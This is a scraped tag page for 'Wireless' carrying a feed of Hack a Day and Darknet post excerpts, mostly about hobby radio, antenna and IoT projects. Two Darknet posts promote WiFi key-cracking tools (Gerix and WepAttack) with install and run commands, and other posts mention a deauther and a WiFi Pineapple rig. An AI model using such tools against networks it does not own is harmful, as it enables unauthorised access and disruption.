«
Expand/Collapse
268 items tagged "Wireless"
Related tags:
quot [+],
mac [+],
antenna [+],
tool [+],
routers [+],
black hat [+],
arduino [+],
airodump [+],
zykeys [+],
wireless tool [+],
wep [+],
travis goodspeed [+],
router [+],
network [+],
models [+],
wlan [+],
wireless sensors [+],
wireless router [+],
security [+],
radio [+],
problem [+],
netgear [+],
card [+],
Soporte [+],
wireless cable modem [+],
video [+],
usa [+],
root [+],
quadcopter [+],
netgear wireless cable modem gateway [+],
netgear wireless cable modem [+],
mode [+],
manager [+],
ivs [+],
information disclosure vulnerability [+],
goodspeed [+],
file [+],
exploiting [+],
control [+],
cap [+],
bt4 [+],
bssid [+],
authors [+],
audio [+],
travis [+],
testing [+],
stress testing [+],
station [+],
spectrum analyzer [+],
source [+],
sony vaio 4 [+],
sony [+],
pyrit [+],
password disclosure [+],
passthrough [+],
paper [+],
other [+],
node [+],
nbsp [+],
mode interface [+],
miras [+],
microcontroller [+],
m gs [+],
luis miras [+],
hwk [+],
hacking [+],
device [+],
cuda [+],
code [+],
bluetooth [+],
authentication request [+],
alpha networks [+],
alfa [+],
adsl [+],
adapter [+],
access [+],
wpa tkip [+],
wireless sniffer [+],
wireless lan [+],
wireless hacking [+],
wireless adapter [+],
wireless access points [+],
wep wpa [+],
web [+],
weather [+],
water [+],
version mismatch [+],
using open source tools [+],
use [+],
uav [+],
system [+],
steve riley tags [+],
steve riley [+],
ssid [+],
spectrum [+],
sony vaio [+],
softap [+],
slides [+],
signal [+],
sensors [+],
securing wireless networks [+],
securing [+],
seattle wireless [+],
seattle [+],
sagan [+],
ryan [+],
rt n [+],
robots [+],
rfid [+],
read [+],
question [+],
qis [+],
proxy [+],
proof of concept [+],
promiscuous [+],
problema [+],
poc [+],
pmks [+],
peap [+],
packet [+],
open source tools [+],
oneview [+],
novatel wireless [+],
novatel [+],
news [+],
new [+],
multiple buffer overflow [+],
modem [+],
model [+],
misc [+],
mile [+],
mike kershaw [+],
mike [+],
mifi [+],
metasploit [+],
mac address [+],
link [+],
layer security [+],
layer [+],
larry [+],
lan controller [+],
kismet [+],
ken caruso [+],
john [+],
intel [+],
im me [+],
ids [+],
hey guys [+],
hey [+],
heater [+],
handshake [+],
guestek [+],
gnu general public license [+],
gerix [+],
ftp [+],
essid [+],
encryption [+],
dwa [+],
don [+],
dbi [+],
day [+],
crunch crunch [+],
crossdomain [+],
cpyrit [+],
connection [+],
computer [+],
coffee shops [+],
class [+],
cisco [+],
chris [+],
chipset [+],
caruso [+],
caratteri [+],
car [+],
camera [+],
cable [+],
bugtraq [+],
buffer overflows [+],
buffer overflow vulnerabilities [+],
broadcom [+],
broadband [+],
authentication [+],
asus [+],
apple airport [+],
anyone [+],
andrew [+],
analyzer [+],
america [+],
aircrack [+],
access points [+],
Newbie [+],
NON [+],
Area [+],
zydas [+],
zephyr [+],
zach charat [+],
youth [+],
yagi uda antenna [+],
yagi [+],
xxxx [+],
xbee [+],
x server [+],
wyvern [+],
wpa wpa2 [+],
wpa supplicant [+],
wpa psk [+],
wpa key [+],
world equivalent [+],
wordlist [+],
word [+],
wlassistant [+],
wisp [+],
wirelessly [+],
wireless weather stations [+],
wireless weather station [+],
wireless usb [+],
wireless speaker [+],
wireless security [+],
wireless presenters [+],
wireless presenter [+],
wireless pan [+],
wireless overview [+],
wireless network security [+],
wireless music [+],
wireless mice [+],
wireless lan security [+],
wireless interface [+],
wireless input [+],
wireless electricity [+],
wireless doorbell [+],
wireless data acquisition [+],
wireless controllers [+],
wireless cards [+],
wireless card [+],
wireless broadband gateway [+],
wireless bridge [+],
wing [+],
window [+],
wimax [+],
wilson [+],
william etter [+],
wifu [+],
wifi repeater [+],
wifi hotspot [+],
wifi card [+],
wifi cantenna [+],
wicd [+],
wi fi [+],
whole lot [+],
whay [+],
wes [+],
wep key cracking [+],
weis [+],
web applications [+],
weather data [+],
way [+],
water heater [+],
war driving [+],
wallet [+],
wall [+],
walkie talkies [+],
w lt [+],
vmware [+],
vlf [+],
vicariously [+],
verizon wireless [+],
verizon [+],
variable transformer [+],
vancouver [+],
utah [+],
usb port [+],
usb joystick [+],
usb card [+],
usb [+],
urged [+],
unlocking [+],
university grad [+],
university college london [+],
universal software [+],
unisex bathroom [+],
unisex [+],
una [+],
uda [+],
ubiquitous presence [+],
two guns [+],
tweet [+],
tv cabinet [+],
tutorial [+],
turkey [+],
troll [+],
transplant [+],
transmitter [+],
transmission antennas [+],
transmission [+],
trango broadband wireless [+],
trango [+],
tracking camera [+],
tp link [+],
tommy gober [+],
tom shannon [+],
title [+],
tire [+],
timer [+],
time [+],
tilt system [+],
tilt rotor [+],
tilt [+],
ti 84 [+],
threat models [+],
thread [+],
thomson [+],
thomas pfeifer [+],
thick metal [+],
thanksgiving turkey [+],
thanksgiving [+],
thanks in advance [+],
texas [+],
test option [+],
test flights [+],
test [+],
terminal node controller [+],
terminal [+],
tempo fa [+],
television [+],
telemetry data [+],
telemetry [+],
target [+],
take [+],
tags [+],
tactical [+],
swiss army knife [+],
summit [+],
sudo [+],
student [+],
stolen photo [+],
status [+],
speaker [+],
space [+],
souci [+],
sony laptop [+],
sono [+],
someone [+],
solar water heater [+],
solar panel [+],
solar [+],
software radio [+],
software hacks [+],
sniffing [+],
sms messages [+],
smith charts [+],
sled races [+],
sistema computacional [+],
sink [+],
signal boosters [+],
sierra [+],
side [+],
shining stars [+],
servos [+],
servo control [+],
servo [+],
service vulnerability [+],
server settings [+],
sensor package [+],
sensor network [+],
sensor data [+],
sensor [+],
sending [+],
semester project [+],
segnale [+],
security weakness [+],
security authors [+],
securitng [+],
sd card [+],
screw threads [+],
schools and universities [+],
scheda [+],
scappare [+],
salve [+],
saludos [+],
sacco [+],
s programming [+],
ryan guerra [+],
rudimentary knowledge [+],
rtl [+],
rover [+],
rotor [+],
rocket launch [+],
rocket [+],
robot [+],
ritewing [+],
riley [+],
rifle [+],
riconosce [+],
rick [+],
rf wireless [+],
rf transmitters [+],
rf development [+],
rf communications [+],
reverse engineering [+],
retrotechtacular [+],
retro systems [+],
retro [+],
reti [+],
rete [+],
request [+],
repeater [+],
renewal interval [+],
reflector [+],
redir [+],
redes inalambricas [+],
receiver pair [+],
receiver [+],
realtek [+],
real mode [+],
read denial [+],
rc plane [+],
rc aircrafts [+],
ranger texas [+],
ranger [+],
range [+],
rainbowcrack [+],
rafael [+],
radio waves [+],
radio transmission [+],
radio transceiver [+],
radar systems [+],
radar [+],
quality motors [+],
quadrotor [+],
qst [+],
python script [+],
pwm output [+],
proximity [+],
proxim orinoco [+],
proxim [+],
protocols [+],
proper noun [+],
propellers [+],
project [+],
program [+],
problem thanks [+],
pringles [+],
presenter [+],
premission [+],
power [+],
potenza [+],
potentiometer [+],
positioning system [+],
portal [+],
pool size [+],
point [+],
plug in [+],
playstation controller [+],
plantenna [+],
plant [+],
place [+],
piece of furniture [+],
picture [+],
picatinny rails [+],
physical memory [+],
phone [+],
phil [+],
peter sobey [+],
peripherals [+],
per [+],
pendulum [+],
pendrive [+],
pcmcia card [+],
pcb [+],
pc proximity [+],
pc locks [+],
paul klemstine [+],
paul [+],
password lists [+],
password list [+],
password [+],
passive radar [+],
passersby [+],
parabolic reflector [+],
parabolic [+],
pair [+],
painting [+],
paint [+],
p.s. vboxguestadditions [+],
p.s. ho [+],
overview [+],
ossman [+],
orinoco gold [+],
orinoco [+],
omnidirectional antenna [+],
omni directional antenna [+],
official web [+],
nyc [+],
nvidia geforce 8600m gs [+],
nvidia [+],
nuova [+],
number 11 [+],
nuclear containment [+],
nrf [+],
notifier [+],
notebook adapter [+],
noob [+],
nike [+],
night sky [+],
niels teusink [+],
niels [+],
nice [+],
new york city [+],
new ways [+],
networks [+],
network node [+],
netgear wg111 [+],
netcomm [+],
net stumbler [+],
net [+],
nessus [+],
nbsp nbsp nbsp nbsp nbsp [+],
nail polish remover [+],
nail clipper [+],
mr.pantz [+],
mouse [+],
motorized camera [+],
motion [+],
morse code [+],
morse [+],
moon 3 [+],
moon [+],
mood [+],
monitor [+],
mon [+],
module [+],
modem sierra [+],
model airplanes [+],
model aircrafts [+],
microcontrollers [+],
michael vincent [+],
michael ossman [+],
meter range [+],
metal [+],
mesh dish [+],
medical [+],
md5 hash [+],
max [+],
material base [+],
master mode [+],
master [+],
massachusetts [+],
martin [+],
mario cup [+],
mapping [+],
mandy andress [+],
manchester encoding [+],
manchester [+],
man in the middle attack [+],
mame [+],
mac problem [+],
mac addresses [+],
lukas lueg [+],
luge track [+],
luge [+],
luck [+],
low frequency [+],
low [+],
london [+],
lithium polymer battery [+],
linksys wrt54gl router [+],
link quality [+],
limitation [+],
liado [+],
li poly [+],
letto [+],
lettes [+],
lego pieces [+],
lecture course [+],
launching model rockets [+],
launching [+],
laptop [+],
lan security [+],
lan [+],
lacross [+],
kurtz [+],
kumar [+],
key [+],
karma [+],
john the ripper [+],
john ripper [+],
jerome demers [+],
jerome [+],
jamming [+],
jammed [+],
james bond [+],
jad [+],
ism band [+],
ipod charger [+],
invalid [+],
inti [+],
internet signal [+],
internet [+],
internal gps [+],
internal antennas [+],
interfaccie [+],
injection [+],
infrared transmission [+],
infrared technology [+],
inexpensive receiver [+],
incremental mode [+],
imp [+],
identifying [+],
ibm t61 [+],
hunting [+],
human shaped [+],
houston resident [+],
houston [+],
hot water heater [+],
host files [+],
homebrew [+],
home [+],
holiday cheer [+],
hola [+],
high gain antenna [+],
hi friends [+],
hex editor [+],
hero [+],
helicopter [+],
heathkit hero [+],
heathkit [+],
heat sink [+],
heat [+],
heart of the matter [+],
headset [+],
having some sort [+],
hash [+],
hardware store [+],
hardware hacks [+],
hanshake [+],
hand bell [+],
ham radio [+],
hackerspace [+],
hackers [+],
hacker attack [+],
hacked [+],
hackaday [+],
grrrrrr [+],
grimwepa [+],
grazie mille [+],
gravity fed [+],
graphics card [+],
graphic calculator [+],
grad student [+],
gps position [+],
gps [+],
gmail [+],
giant hill [+],
ghz [+],
generation [+],
generar [+],
function [+],
friend [+],
frequency communications [+],
free geek [+],
free flight [+],
frame [+],
forum [+],
foam wing [+],
fm radio [+],
fm chip [+],
flying turkey [+],
fly [+],
flight [+],
fliers [+],
firewall programs [+],
fiber tubes [+],
fiber [+],
ff ff ff [+],
fastweb [+],
fakeap [+],
fake [+],
facebook [+],
face [+],
faccio [+],
fablab [+],
fab lab [+],
external antennas [+],
extension lead [+],
extending [+],
exact model [+],
ettercap [+],
ethernet [+],
error correction [+],
error [+],
engineering [+],
encryption key [+],
emulating [+],
electricity [+],
electric [+],
educational robot [+],
dwl g520 [+],
dumpster diving [+],
dual boot [+],
dsl router [+],
drf [+],
dr. nick [+],
dr nick [+],
dport [+],
downgrade [+],
doorbell [+],
doesn [+],
disk [+],
dish [+],
discipline [+],
directional antenna [+],
directional [+],
digital picture frame [+],
digital [+],
development platforms [+],
denial of service [+],
demo [+],
dell optiplex gx270 [+],
dell optiplex [+],
debutant [+],
debian etch [+],
debian [+],
datapacket [+],
database connection [+],
database [+],
data packets [+],
data packet [+],
data [+],
darpa funded [+],
darpa [+],
dan veeneman [+],
daily basis [+],
da solo [+],
d prerouting i [+],
d i [+],
cw keys [+],
cve [+],
custom rc [+],
current status [+],
cryptographical [+],
crunch [+],
creator [+],
cracking [+],
cpu [+],
cowpatty [+],
course [+],
correct setup [+],
copter [+],
cooking utensils [+],
controller. this [+],
controller [+],
control mechanism [+],
control feature [+],
control circuitry [+],
containment chamber [+],
consumers [+],
consola [+],
configuration directory [+],
config [+],
command [+],
colored balloons [+],
colorado [+],
color television [+],
colin [+],
coils [+],
coffee table [+],
coffee [+],
cloud [+],
client [+],
clicker [+],
classmates [+],
classic [+],
cigar box [+],
ciao [+],
church [+],
chuck [+],
chris hurley tags [+],
chris hurley [+],
chopchop [+],
chop chop [+],
chip [+],
chiavetta [+],
checkpoint [+],
che [+],
charging system [+],
charger [+],
charat [+],
chaos communication congress [+],
change [+],
chan website [+],
cereal boxes [+],
cellphones [+],
cell phone battery [+],
ceiling lamp [+],
case houses [+],
carte [+],
cars [+],
card work [+],
captive portal [+],
captive [+],
cantenna [+],
cant remeber [+],
canada [+],
calculator [+],
cable modem [+],
c ppm [+],
business hub [+],
bunnie [+],
bunch [+],
buffer [+],
brute force method [+],
brilliant solution [+],
brian j hoskins [+],
brent strysko [+],
brent [+],
bluetooth sniffer [+],
bluetooth module [+],
bluetooth headset [+],
block [+],
blade propellers [+],
bigpond [+],
benchmark version [+],
benchmark [+],
ben kurtz [+],
ben [+],
bell [+],
begining [+],
bcm [+],
battery [+],
bathroom [+],
bash script [+],
ballistic trajectories [+],
backtracks [+],
avvio [+],
austrian alps [+],
attiny [+],
atmega8 [+],
atleast [+],
athrose [+],
atheros ar5007eg [+],
atheros ar5007 [+],
atheros ar5005g [+],
atheros [+],
association [+],
asia [+],
arrow shafts [+],
arp [+],
army [+],
api [+],
antenna yagi [+],
antenna setup [+],
antenna design [+],
animatronic head [+],
angus [+],
analog voltage [+],
analog sticks [+],
analog control [+],
amateur radio operators [+],
although [+],
alternative [+],
alright [+],
alps [+],
alpha [+],
alice [+],
alex [+],
aircraft [+],
aircrackhead [+],
airbase [+],
aim [+],
agn [+],
adhoc [+],
acetone [+],
access point [+],
accer [+],
accelerometers [+],
accelerometer [+],
abilitazioni [+],
abhimanyu [+],
abera [+],
abces [+],
abator [+],
abandonat [+],
Hardware [+],
Hackerspaces [+],
Espace [+],
1b channel [+],
wifi [+],
BackTrack [+],
Angolo [+],
wpa [+],
hacks [+],
valore,
usb adapter,
trovato,
track,
sta,
search function,
samsung,
riesco,
relationship,
rainbow,
ragazzi,
propia,
problemi,
passphrase,
notebook,
mkdir,
migliore,
matching,
manipulations,
mack,
mac adresses,
internet card,
hxxp,
help,
fritz box,
fritz,
exploit,
eee pc,
dont,
dictionary files,
default keys,
default,
dat,
connecting,
comprato,
ciao a tutti,
chiave,
bt3,
box models,
box,
auth,
antena,
acquisto,
Howto,
5 months
-
-
9:00
»
Hack a Day
Amazon Dash buttons were the ultimate single purpose networked device; it really can’t get much simpler than a push button that sends a single message to a fixed endpoint. It was an experiment in ultimate convenience, an entry point to a connected home, and a target for critics of consumerism excess and technological overkill.
But soon they’ll be little more than a footnote in the history of online shopping, as CNet reports Amazon will take the order system offline at the end of the month. With the loss of their original intended usage, there’s nothing to stop us from hacking any Dash buttons we can get our hands on.
Of course, this decision should come as little surprise. Amazon’s in-home retail point of sale has graduated from these very limited $5 buttons to Alexa-powered voice controlled devices. Many people also carry a cell phone at all times capable of submitting Amazon orders. While there are many good reasons to be skeptical of internet connected appliances, they’re undeniably finding a niche in the market and some have integrated their own version of a Dash button to re-order household supplies.
But are hackers still interested in hacking Dash buttons? Over the lifespan of Amazon Dash buttons, our project landscape has shifted as well. We’re certainly still interested in the guts an Echo Dot. But if we wanted to build a simple networked button, we can use devices like an ESP8266 which are almost as cheap and far easier to use. Using something intended for integration means we don’t have headaches like determining which generation hardware we have.
Despite those barriers, we’ve had many Dash button hacks on these pages. A to-do list updater was the most recent and we doubt it will be the last, especially as Amazon’s deactivation should mean a whole new flood of these buttons will become available for hacking.
[via Ars Technica]
-
-
13:00
»
Hack a Day
WiFi was the killer technology that made home networking easy. No more messing around with hubs and cables and drilling holes in walls, simply turn the devices on and hit connect. Over time the speed and range has increased, but those with larger houses or granny flats out back have suffered. There are tricks to boost range however, and some of them involve cookware.
The clever hack here is to use a metal strainer as a parabolic reflector, to capture signals and focus them onto the PCB antenna in a USB WiFi dongle. The strainer is drilled out, and a USB extension cable has its female end glued into the base. This allows the dongle to be positioned inside the strainer. For best results, the dongle should be positioned so that its antenna elements are sitting at the focal point of the parabola; this can be determined through mathematics or simply by experimenting with positions to see what gives the best signal strength.
It’s a design that is quite directional, and should help boost signals as well as block out those from unwanted stations. The build is simple, and can even be tripod mounted which helps with aiming and looks cool to boot.
For many, WiFi antenna hacks are old school, but it’s always good to keep the techniques in mind as you never know when it will come in handy to solve a new problem. Some crazy things are possible with the right gear, too.
-
-
19:00
»
Hack a Day
The ESP8266 is a great processor for a lot of projects needing a small microcontroller and Wi-Fi, all for a reasonable price and in some pretty small form factors. [Simon] used one to build a garage door opener. This project isn’t really about his garage door opener based on a cheap WiFi-enabled chip, though. It’s about the four year process he went through to learn how to develop on these chips, and luckily he wrote a guide that anyone can use so that we don’t make the same mistakes he did.
The guide starts by suggesting which specific products are the easiest to use, and then moves on to some “best practices” for using these devices (with which we can’t argue much), before going through some example code. The most valuable parts of this guide especially for anyone starting out with these chips are the section which details how to get the web server up and running, and the best practices for developing HTML code for the tiny device (hint: develop somewhere else).
[Simon] also makes extensive use of the Chrome developers tools when building the HTML for the ESP. This is a handy trick even outside of ESP8266 development which might be useful for other tasks as well. Even though most of the guide won’t be new to anyone with experience with these boards, there are a few gems within it like this one that might help in other unrelated projects. It’s a good read and goes into a lot of detail about more than just the ESP chips. If you just want to open your garage door, though, you have lots of options.
-
-
16:01
»
Hack a Day
In a move guaranteed to send audiophiles recoiling back into their sonically pristine caves, two doctoral students at ETH Zurich have come up with an interesting way to embed information into music. What sounds crazy about this is that they’re hiding data firmly in the audible spectrum from 9.8 kHz to 10 kHz. The question is, does it actually sound crazy? Not to our ears, playback remains surprisingly ok.
You can listen to a clip with and without the data on ETH’s site and see for yourself. As a brief example, here’s twelve seconds of the audio presenting two versions of the same clip. The first riff has no data, and the second riff has the encoded data.
document.createElement('audio');
https://hackaday.com/wp-content/uploads/2019/07/ZTH-no-Filter.mp3
You can probably convince yourself that there’s a difference, but it’s negligible. Even if we use a janky bandpass filter over the 8 kHz -10 kHz range to make the differences stand out, it’s not easy to differentiate what you’re hearing:
https://hackaday.com/wp-content/uploads/2019/07/ZTH-with-8k-10k-filter.wav
After many years of performing live music and dabbling in the recording studio, I’d describe the data-encoded clip as having a tinny feedback or a weird reverb effect. However, you wouldn’t notice this in a track playing on the grocery store’s speaker.
Why Use Audible Frequencies?
Why in the world would you want to use an audible frequency to transmit information? The easy answer is that there are already audible transmitters and receivers everywhere. Specifically, cell phones. According to the researchers, this works better than ultrasonic because cell phone microphones have low sensitivity at high frequencies and attenuate faster than audible frequencies.
By encoding data into the audible range of music, coffee shops could broadcast their WiFi passwords inside their Sia-heavy playlists. (Why is it always Sia?) Cell phones could then detect the password and automatically connect.
Why it Sounds Fine: OFDM and Masking Frequencies
The original paper goes into more detail, but the system doesn’t wreck the music because it uses the music to mask the data. It detects the strongest frequencies in a track, and embeds data around the harmonics of the frequency. This way, the encoded data simply sounds like it’s part of the music.
Of course, it doesn’t just encode data on one frequency. It uses orthogonal frequency-division multiplexing (OFDM). OFDM essentially spreads the transmission out over multiple carrier frequencies to reduce the power of a single frequency. It’s used in technologies like 4G and 802.11a WLAN. OFDM allows a system to push more power in a band while minimizing the amplitude of specific tones.
Unsurprisingly, the data rates are far from fiber speeds. Using low frequency carriers has its disadvantages. Researchers were able to reach 300 – 400 bits/s (yes, bits not bytes). The transmission distance and accuracy is respectable, though, at 24 meters with less than a 10% bit error ratio. The BER and data rate varies by song, with Queen and the Gorillaz leading the charge.
In the real world they expect about 200 bits/s, which is enough to send roughly 25 words per second. This is fast enough to transmit text info or simple data streams, but you won’t want to browse dank memes with this data link.
Thanks [Qes] for the tip!
-
-
19:00
»
Hack a Day
If you have done any sort of radio work you probably have a fair idea about what antennas do. It is pretty easy to have a cursory understanding of them, too. You probably know there’s something magic about antennas that are a quarter wave long or a half wave long and other multiples. But do you know why that matters? Do you understand the physics of why wire in a special configuration will cause signals to propagate through space? [Learn Engineering] does, and their new video is one of the best graphical explanations of what’s really going on in an antenna that we’ve seen. You can watch the video below.
If you tackle antennas using math, it is a long discussion. However, this video is about 8 minutes long and uses some great graphics to show how moving charges can produce a propagating electromagnetic field.
The 8 minute time limit did however leave us wanting more, as the first part does a great job of explaining charge movement in a dipole but what follows just looks very quickly at some TV, satellite, and cell phone antennas.
This video won’t make you an antenna design expert, but unless you are a guru we will bet you find at least one thing you didn’t know in them. If you want to go further, [Mark Hughes’] introduction has graphics that aren’t quite as slick as these, but still make for a much easier explanation than you’ll find in a textbook. If you do go all in on antennas, modeling them is easier than it used to be, thanks of course to computers.
-
-
11:31
»
Hack a Day
Over the last few months we’ve seen an influx of homebrew RC controllers come our way, and we’re certainly not complaining. While the prices of commercial RC transmitters are at an all-time low, and many of them can even run an open source firmware, there’s still nothing quite like building the thing yourself. How else are you going to get exactly what you want?
For this entry into the 2019 Hackaday Prize, [Vitor de Miranda Henrique] is working on his own version of the ultimate open source remote control. His design follows some of the trends we’ve already seen in terms of outward design and hardware expandability, but also branches off into some new territory with features such as dual integrated displays.
Why does your controller need two displays? The top 4.3 inch TFT is linked up to a 5.2 GHz video receiver, which makes it perfect for controlling vehicles in “first-person” view, such as drones. The lower screen is a 2.8 inch touch screen from Adafruit, which is intended to be used for navigating through menus and options once the firmware is fully fleshed out.
Powering the controller is a ESP32 and dual MCP23017 GPIO expanders to connect up to the array of input devices available to the user. The current iteration of the controller has ten switches, two encoders, some buttons, and a pair of scroll wheels for good measure. Oh, and of course there are a couple of joysticks in the mix as well. All the devices terminate at a custom PCB in the back of the controller which looks to make modifying and adding input devices simple and neat.
We’ve previously seen the Alpha V1, an open source controller with a fairly similar setup, albeit without the dual displays. If even that one is a bit more complex than you’d like, you can always just do it with an Arduino.
The
HackadayPrize2019 is Sponsored by:
-
-
13:00
»
Hack a Day
Interfering with radio communications, whether through jamming, deauthing attacks, or other meddling, is generally considered a crime, and one that attracts significant penalties. However, studying such techniques should provide a useful edge in the electronic wars to come. In this vein, [Giorgio Filardi] has recently built a WiFi deauther the …read more
-
-
22:00
»
Hack a Day
The Internet of Things is upon us, and with that comes a deluge of smart cameras, smart home monitors, and smart home locks. There actually aren’t many smarts in these smart conveniences, and you can easily build your own. That’s what [MakerMan] did with some off-the-shelf parts and just a …read more
-
-
19:00
»
Hack a Day
Many of us have fond memories of our introduction to electronics through the “200-in-1” sets that Radio Shack once sold, or even the more recent “Snap Circuits”-style kits. Most of eventually us move beyond these kits to design our circuits; still, there’s something to be said for modular designs. This …read more
-
-
8:30
»
Hack a Day
Zombies, for the most part, remain fictional and are yet to trouble human communities. Despite the many real world calamities we face, the zombie concept remains a compelling one and the subject of many books, films, and video games. [CNLohr] was at MagStock Eight when he met [Aaron], who has developed a real world game in this vein. (YouTube, embedded below.)
[Aaron]’s game goes by the name of SpyTag, and is played by a group of people who each have a small device affixed to their wrist. Two players start off as zombies, and the rest are humans. The zombies …read more
-
-
1:00
»
Hack a Day
If you’ve ever engaged in social media, you’re familiar with the little thrill you receive when your post, tweet, or project gets a like. But, if logging in feels like too much overhead to obtain your dopamine reward, [pt’s] CircuitPython Hackaday portal may be just what you’re looking for. This project creates a stand-alone counter to display the number of “skulls” (aka likes) received by a project on hackaday.io, and of course, it’s currently counting its own.
The code is running on a SAMD51 (Cortex M4) microcontroller and serving up the skulls on 240×320 TFT display. For WiFi connectivity, the …read more
-
-
22:00
»
Hack a Day
Not long ago, we published an article about researchers adding sensor data to passive RFID tags, and a comment from a reader turned our heads to a consumer/maker version which anyone can start using right away. If you’re catching up, passive RFID technology is behind the key fobs and stickers which don’t need power, just proximity to the reader’s antenna. This is a much “hackier” version that works with discrete signals instead of analog ones. It will not however require writing a new library and programming new tags from the ground up just for the user to get started, so …read more
-
-
8:00
»
Hack a Day
[Nikola Tesla] believed he could wirelessly supply power to the world, but his calculations were off. We can, in fact, supply power wirelessly and we are getting better but far from the dreams of the historical inventor. The mainstream version is the Qi chargers which are what phones use to charge when you lay them on a base. Magnetic coupling is what allows the power to move through the air. The transmitter and receiver are two halves of an air-core transformer, so the distance between the coils exponentially reduces efficiency and don’t even think of putting two phones on a …read more
-
-
22:01
»
Hack a Day
Here at Hackaday, we have to admit to neglecting a few houseplants in our time. Let’s face it… a cold, hard, thinking machine can care for our green friends better than you can. Why not team up? [cabuu]’s WiFi-enabled soil moisture sensor will do the trick in case you, too, want happy plants.
This is one of those projects which would have been much more difficult even five years ago, and really shows how lucky we are to have accessible technology at our fingertips. It’s conveniently constructed from off-the-shelf electronics modules, and nestled inside a 3D-printed case. The design is …read more
-
-
12:17
»
Darknet
Gerix WiFi cracker is an easy to use Wireless 802.11 Hacking Tool with a GUI, it was originally made to run on BackTrack and this version has been updated for Kali (2018.1).
To get it up and running make sure you do:
apt-get install qt4-dev-tools
Running Gerix Wireless 802.11 Hacking Tool
$ python gerix.py
You can download Gerix here:
gerix-wifi-cracker-master.zip
Or read more here.
Read the rest of Gerix WiFi Cracker – Wireless 802.11 Hacking Tool With GUI now! Only available at Darknet.
-
-
5:47
»
Darknet
WepAttack is a WLAN open source Linux WEP key hacking tool for breaking 802.11 WEP keys using a wordlist based dictionary attack.
This tool is based on an active dictionary attack that tests millions of words to find the right key. Only one packet is required to start an attack.
What is a WEP Key?
Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.[1] WEP, recognizable by its key of 10 or 26 hexadecimal digits (40 or 104 bits), was at one time widely in use and was often the first security choice presented to users by router configuration tools.
Read the rest of WepAttack – WLAN 802.11 WEP Key Hacking Tool now! Only available at Darknet.
-
-
22:00
»
Hack a Day
[Mare] has a visual guide and simple instructions for making DIY mini helical 868 MHz antennas for LoRa applications. 868 MHz is a license-free band in Europe, and this method yields a perfectly serviceable antenna that’s useful where space is constrained.
The process is simple and well-documented, but as usual with antenna design it requires attention to detail. Wire for the antenna is silver-plated copper, salvaged from the core of RG214U coaxial cable. After straightening, the wire is wound tightly around a 5 mm core. 7 turns are each carefully spaced 2 mm apart. After that, it’s just a matter …read more
-
-
4:00
»
Hack a Day
Sometimes you need to hack on the go. [Supertechguy] has put together an interesting system for hacking on the hoof called the Pineapple Pi. This combines a Raspberry Pi 3 with a seven-inch touchscreen and a Hak 5 WiFi Pineapple into a handy portable package that puts all of the latest WiFi and ethernet hacking tools to hand. The package also includes a 20,100 mAh battery, so you won’t even need a wall socket to do some testing. It’s a bit of a rough build — it is held together with velcro, for instance — but it’s a good place …read more
-
-
22:00
»
Hack a Day
If it’s stupid and it works, then it’s not stupid. There’s no better evidence of that than [Tobias]’ networking setup.
He recently had to distribute Ethernet through a building, and there are a few ways to do that. You can use regular ‘ol twisted pair, or fiber, but in this case running new cables wasn’t possible. WiFi would be the next obvious choice, the distance was just a bit too far for ‘regular’ WiFi links. Ethernet over power lines was an option, but there are amateur radio operators in the house, and they put out a bunch of interference and …read more
-
19:01
»
Hack a Day
Back in the early days of Arduino proliferation (and before you ask, yes we realize there was a time before that too), wireless was a strange and foreign beast. IR communication was definitely a thing. And if you had the funds there was this cool technology called ZigBee that was available, often in funny blue house-shaped XBee boards. With even more funds and a stomach for AT commands you could even bolt on a 2G cell radio for unlimited range. WiFi existed too, but connecting it to a hobbyist ecosystem of boards was a little hairier (though maybe not for …read more
-
-
19:01
»
Hack a Day
LoRa is the new hotness in low-power, long-range communications. Wanting to let the packets fly, [Xose] was faced with a frequecny problem and ended up developing a Europe-friendly LoRa module for the M5Stack system. The hardware is aimed at getting onto The Things Network, a LoRa based network that provides connectivity for IoT devices. While there was an existing M5Stack module for LoRa, it only supported 433 MHz. Since [Xose] is in Europe, an 868 MHz or 915 MHz radio was needed. To solve this, a custom board was built to connect the HopeRF RFM69 series of modules to the …read more
-
-
22:00
»
Hack a Day
Powering IoT devices is often a question of batteries or mains power, but in rare exceptions to this rule there is no power supply (PDF Warning). At the University of Wisconsin-Madison and the University of California, San Diego, researchers have gone the extra mile to make advanced backscatter devices, and these new tags don’t need the discrete components we have seen in previous versions. They are calling it LiveTag, and it doesn’t need anything aside from a layer of foil printed or etched on a flexible ceramic-PTEF laminate. PTEF is mostly seen in the RF sector as a substrate for …read more
-
-
16:00
»
Hack a Day
Over the years, we’ve seen dozens of projects that sell themselves as an ‘Open Source’ cellphone, a hackable cellphone, or some other confabulation of a microcontroller, screen, and a cellular module. The WiPhone is not one of these projects. That’s not to say it’s not an Open Source phone that’s intended to be hackable. No, this is a DIY phone that doesn’t make cellular calls, because this is a phone that only works with SIP and VoIP apps. It’s a WiPhone, and something a lot of us have been waiting for.
The hardware for this WiFi enabled phone is extremely …read more
-
-
22:00
»
Hack a Day
It’s now possible to not only see people through walls but to see how they’re moving and if they’re walking, to tell who they are. We finally have the body scanner which Schwarzenegger walked behind in the original Total Recall movie.
This is the work of a group at the MIT Computer Science and Artificial Intelligence Laboratory (CSAIL). The seeing-through-the-wall part is done using an RF transmitter and receiving antennas, which isn’t very new. Our own [Gregory L. Charvat] built an impressive phased array radar in his garage which clearly showed movement of complex shapes behind a wall. What is …read more
-
-
1:00
»
Hack a Day
It used to be homebrew ham gear meant something simple. A couple of active devices that could send CW. Maybe a receiver with a VFO. But only the most advanced builders could tackle a wide range SSB transceiver. Today, that goal is still not trivial, but it is way easier due to specialty ICs, ready access to high-speed digital signal processing, and advances in software-defined radio techniques. [Charlie Morris] decided to build an SSB rig that incorporated these technologies and he shared the whole process from design to operation in a series of nine videos. You can see the first …read more
-
-
4:00
»
Hack a Day
[Kathy] recently posted an interesting video about the connection of an electronics pioneer named [Hertha Ayrton] to the arc transmitter. The story starts with the observation of the arc lamp — which we learned was a typo of arch lamp.
[Hertha] was born into poverty, but — very odd for the day — obtained a science education. That’s probably a whole story in of itself. During her schooling, she fell in love with her professor [William Ayrton] and they wed.
[Hertha] took over her husband’s research into arcs and made impressive results in understanding the physics of an arc. The …read more
-
-
13:00
»
Hack a Day
